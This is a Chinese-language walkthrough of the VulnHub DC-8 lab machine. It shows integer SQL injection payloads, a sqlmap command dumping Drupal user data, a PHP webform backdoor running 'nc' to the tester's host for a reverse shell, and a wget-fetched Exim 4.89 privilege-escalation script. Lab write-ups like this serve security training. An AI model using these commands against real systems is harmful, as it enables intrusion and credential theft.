写在前面
靶场链接:
https://www.vulnhub.com/entry/dc-8,367/
DC系列,有些知识点在DC:1
中提到,可以翻阅
DC:1
信息搜集
首先进行存活扫描
这里就直接展示端口扫描了,显然有80
和22
进入80
看看
直接指纹识别,是drupal7
版本
简单尝试和探测
试下之前drupal
的经典漏洞,不太行
如果你想了解这个漏洞的详情,这里推荐一篇好文:https://xz.aliyun.com/t/2271
路径扫描,很容易找到robots.txt
显然暴露了登录url
进去看看,并没有什么线索,可以爆破,暂时先放一边
SQL布尔盲注
随意点击一下,有一个参数跟随变化,这是sql
注入的标志
测试一下,真的报错了,同时泄露敏感信息,暴露出sql
语句
明显是一个整型sql
注入,丢一些简单的语句进行测试
nid=1 or 1=1
nid=1 order by 1
上述都成功了,判断为整型注入,列数为1
,继续探测
1 union select 2333
这个结果表示无回显,继续进行盲注测试
-1 union select length(database())>2
-1 union select length(database())>10
这里差异非常明显了,使用0
和1
来做盲注的区别,非常良心,在真实情况下几乎不可能遇见就是了
可以写脚本,sqlmap
也可以,这种盲注差异标志比较明显的,sqlmap
非常方便
判断成功
一路探测,到最后的用户数据和密码
sqlmap -u http://192.168.101.31/?nid=1 -D d7db -T users -C name --dump
这个形式明显可以跑一下john
跑出来一个密码,应该是作者设计好的
后台RCE
进入后台,开始找后台RCE
,一般后台就是模板文件,编辑器,文件上传点。一顿翻找后,在表单设置这里看到可选php
代码
这个设置可以更改提交后返回的数据
那么,在这个页面上马,同时访问这个提交完成的界面即可
一句话木马我暂时没连成功,可以使用msf
中的后门
如果你觉得麻烦,可以用下面这个命令反弹
<?php
system("nc 192.168.101.115 -c /bin/bash");
?>
这里演示就直接反弹出来,比较简单直观
suid提权
同样的思路,查找suid
文件
比较奇特的有一个exim4
程序,msf
搜索后有这个命令的漏洞
Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统。通常该软件会与Dovecot或Courier等软件搭配使用。Exim同时也是“进出口”(Export-Import)的英文缩写。
先确定版本,为4.89
查找一下poc
,有一个本地提权的sh
文件
拷贝出来,准备上传文件,这里利用的方式的远程获取的方式,在有目标的一定权限情况下,可以尝试主动连接获取。
使用python
开启server
python3 -m http.server 2333
这个命令,可以快速在当前文件夹下开启http
服务,指定端口即可
注意在tmp
文件夹下进行,有权限,使用wget
命令进行获取
wget 192.168.101.115:2333/exim_hack.sh
注意这个脚本有两个payload
选择,使用-h
查看,直接执行可能不成功哦,最好指定一下
./exim_hack.sh -m netcat
注意它权限时间只有一段时间,不太稳定,可以多试几次
提权成功,查看flag